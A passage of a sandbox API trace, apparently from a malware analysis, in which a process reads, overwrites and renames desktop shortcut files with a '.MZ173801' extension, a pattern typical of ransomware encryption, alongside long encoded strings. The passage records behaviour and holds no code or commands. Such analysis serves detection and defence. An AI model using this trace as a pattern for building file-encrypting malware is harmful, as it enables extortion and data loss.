lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.486] GetCurrentThreadId () returned 0x1358 [0124.486] GetCurrentThreadId () returned 0x1358 [0124.486] GetCurrentThreadId () returned 0x1358 [0124.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.487] GetCurrentThreadId () returned 0x1358 [0124.487] GetCurrentThreadId () returned 0x1358 [0124.487] GetCurrentThreadId () returned 0x1358 [0124.487] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" (normalized: "c:\\users\\public\\desktop\\acrobat reader dc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0124.487] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.487] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.487] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x852 [0124.487] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.487] ReadFile (in: hFile=0x40c, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x852, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x852, lpOverlapped=0x0) returned 1 [0124.488] CloseHandle (hObject=0x40c) returned 1 [0124.488] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" (normalized: "c:\\users\\public\\desktop\\acrobat reader dc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0124.490] WriteFile (in: hFile=0x40c, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x852, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x852, lpOverlapped=0x0) returned 1 [0124.497] CloseHandle (hObject=0x40c) returned 1 [0124.498] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" (normalized: "c:\\users\\public\\desktop\\acrobat reader dc.lnk"), lpNewFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk.MZ173801" (normalized: "c:\\users\\public\\desktop\\acrobat reader dc.lnk.mz173801")) returned 1 [0124.498] GetCurrentThreadId () returned 0x1358 [0124.498] GetCurrentThreadId () returned 0x1358 [0124.498] GetCurrentThreadId () returned 0x1358 [0124.498] GetCurrentThreadId () returned 0x1358 [0124.498] GetCurrentThreadId () returned 0x1358 [0124.498] GetCurrentThreadId () returned 0x1358 [0124.498] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.498] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.498] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.498] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0124.499] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.499] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a)) returned 1 [0124.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.499] GetCurrentThreadId () returned 0x1358 [0124.499] GetCurrentThreadId () returned 0x1358 [0124.499] GetCurrentThreadId () returned 0x1358 [0124.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.500] GetCurrentThreadId () returned 0x1358 [0124.500] GetCurrentThreadId () returned 0x1358 [0124.500] GetCurrentThreadId () returned 0x1358 [0124.500] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0124.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x91a [0124.501] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.501] ReadFile (in: hFile=0x40c, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x91a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x91a, lpOverlapped=0x0) returned 1 [0124.501] CloseHandle (hObject=0x40c) returned 1 [0124.501] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0124.502] WriteFile (in: hFile=0x40c, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x91a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x91a, lpOverlapped=0x0) returned 1 [0124.503] CloseHandle (hObject=0x40c) returned 1 [0124.503] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk.MZ173801" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.mz173801")) returned 1 [0124.504] GetCurrentThreadId () returned 0x1358 [0124.504] GetCurrentThreadId () returned 0x1358 [0124.504] GetCurrentThreadId () returned 0x1358 [0124.504] GetCurrentThreadId () returned 0x1358 [0124.504] GetCurrentThreadId () returned 0x1358 [0124.504] GetCurrentThreadId () returned 0x1358 [0124.504] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0124.504] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.504] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7)) returned 1 [0124.505] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 